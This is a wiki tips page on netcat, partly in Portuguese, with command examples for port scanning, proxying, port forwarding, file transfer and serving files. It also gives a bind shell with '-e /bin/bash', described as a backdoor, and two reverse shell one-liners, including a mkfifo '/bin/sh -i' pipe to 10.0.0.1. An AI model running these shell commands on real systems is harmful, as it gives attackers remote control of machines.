Dicas Netcat

De Wiki Hackstore

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.

In 2000, according to www.insecure.org, Netcat was voted the second most functional network security tool. Also, in 2003 and 2006 it gained fourth place in the same category. Netcat is often referred to as a "Swiss-army knife for TCP/IP." Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

Features

Some of netcat's major features are:<ref>http://nc110.sourceforge.net/</ref>

  • Outbound or inbound connections, TCP or UDP, to or from any ports
  • Full DNS forward/reverse checking, with appropriate warnings
  • Ability to use any local source port
  • Ability to use any locally-configured network source address
  • Built-in port-scanning capabilities, with randomization
  • Built-in loose source-routing capability
  • Can read command line arguments from standard input
  • Slow-send mode, one line every N seconds
  • Hex dump of transmitted and received data
  • Optional ability to let another program service established connections
  • Optional telnet-options responder
  • Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.

Examples

Opening a raw connection to port 25 (like telnet)

nc mail.server.net 25

Setting up a one-shot webserver on port 8080 to present the content of a file

{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat some.file; } | nc -l -p 8080
{ echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c <some.file)\r\n\r\n"; cat some.file; } | nc -l -p 8080

The file can then be accessed via a webbrowser under http://servername:8080/. Netcat only serves the file once to the first client that connects and then exits. The second variant provides the content length for browsers that expect it. Note that the -p flag is required to specify listening port only for some variants of nc

Checking if UDP ports (-u) 80-90 are open on 192.168.0.1 using zero mode I/O (-z)

nc -vzu 192.168.0.1 80-90

Note that UDP tests will always show as “open”. The -uz argument is useless.

Pipe via UDP (-u) with a wait time (-w) of 1 second to 'loggerhost' on port 514

echo '<0>message' | nc -w 1 -u loggerhost 514

Port scanning

An uncommon use of netcat is port scanning. Netcat is not considered the best tool for this job, but it can be sufficient (a more advanced tool is Nmap)

nc -v -n -z -w 1 192.168.1.2 1-1000

The “-n” parameter here prevents DNS lookup, “-z” makes nc not receive any data from the server, and “-w 1″ makes the connection timeout after 1 second of inactivity.

Proxying

Another useful behavior is using netcat as a proxy. Both ports and hosts can be redirected. Look at this example:

nc -l 12345 | nc www.google.com 80

Port 12345 represents the request

This starts a nc server on port 12345 and all the connections get redirected to google.com:80. If a web browser makes a request to nc, the request will be sent to google but the response will not be sent to the web browser. That is because pipes are unidirectional. This can be worked around with a named pipe to redirect the input and output.

mkfifo backpipe
nc -l 12345  0<backpipe | nc www.google.com 80 1>backpipe

The "-c" option may also be used:

nc -l 12345 -c 'nc www.google.com 80'

Making any process a server

On a computer A with IP 192.168.1.2:

nc -l 1234 -e /bin/bash

The “-e” option spawns the executable with its input and output redirected via network socket. It connects to computer A from any other computer on the same network:

nc 192.168.1.2 1234
ls -las
total 4288
4 drwxr-xr-x 15 imsovain users 4096 2009-02-17 07:47 .
4 drwxr-xr-x 4 imsovain users 4096 2009-01-18 21:22 ..
8 -rw------- 1 imsovain users 8192 2009-02-16 19:30 .bash_history
4 -rw-r--r-- 1 imsovain users 220 2009-01-18 21:04 .bash_logout
...

This can be used to create a rudimentary backdoor.

Port Forwarding or Port Mapping

On Linux, NetCat can be used for port forwarding. Below are nine different ways to do port forwarding in NetCat (-c switch not supported though):

nc -l -p port1 -c ' nc -l -p port2'
nc -l -p port1 -c ' nc host2 port2'
nc -l -p port1 -c ' nc -u -l -p port2'
nc -l -p port1 -c ' nc -u host2 port2'
nc host1 port1 -c ' nc host2 port2'
nc host1 port1 -c ' nc -u -l -p port2'
nc host1 port1 -c ' nc -u host2 port2'
nc -u -l -p port1 -c ' nc -u -l -p port2'
nc -u -l -p port1 -c ' nc -u host2 port2'

Example, see Proxying

Variants

The original version of netcat was a Unix program. The last version (1.1) was released in March 1996 and is currently mirrored at http://nc110.sf.net/.

There are several implementations on POSIX systems, including rewrites from scratch like GNU netcat or OpenBSD netcat (this last has also new features like IPv6 support). The OpenBSD version has been ported to Windows/Cygwin as well. Mac OS X users can use the Netcat Darwin Port. There is also a Microsoft Windows version of netcat created by Chris Wysopal, and a Cygwin version is available.

Known ports for embedded systems includes versions for the Windows CE (named Netcat 4 wince) or for the iPhone.

BusyBox includes by default a lightweight version of netcat.

Solaris 11 includes netcat implementation based on OpenBSD netcat.

Socat is a more complex variant of netcat. It is larger and more flexible and has more options that must be configured for a given task.

Cryptcat is a version of netcat with integrated transport encryption capabilities.

In the middle of 2005, Nmap announced another netcat incarnation called Ncat. It features new possibilities such as "Connection Brokering", TCP/UDP Redirection, SOCKS4 client and server support, ability to "Chain" Ncat processes, HTTP CONNECT proxying (and proxy chaining), SSL connect/listen support and IP address/connection filtering. Like Nmap, Ncat is cross-platform.


On some systems, modified versions or similar netcat utilities go by the command name(s) nc, ncat, pnetcat, socat, sock, socket, sbd.



Shell reversa usando Netcat

Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.

nc -e /bin/sh 10.0.0.1 1234

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f



Transferindo arquivos usando Netcat

Considerando o IP 192.168.25.10 como sendo a origem, abra a conexão no destino ativando uma porta em listen (server):

# nc -nlv 8888 > arquivo.sh
Listening on [0.0.0.0] (family 0, port 8888)
Connection from [] port 8888 [tcp/*] accepted (family 2, sport 47445)


E envie o arquivo na origem (cliente):

$ nc 192.168.25.10 8888 < arquivo.sh


OBS: Após a transferência a conexão é encerrada em ambas as pontas. ;)


References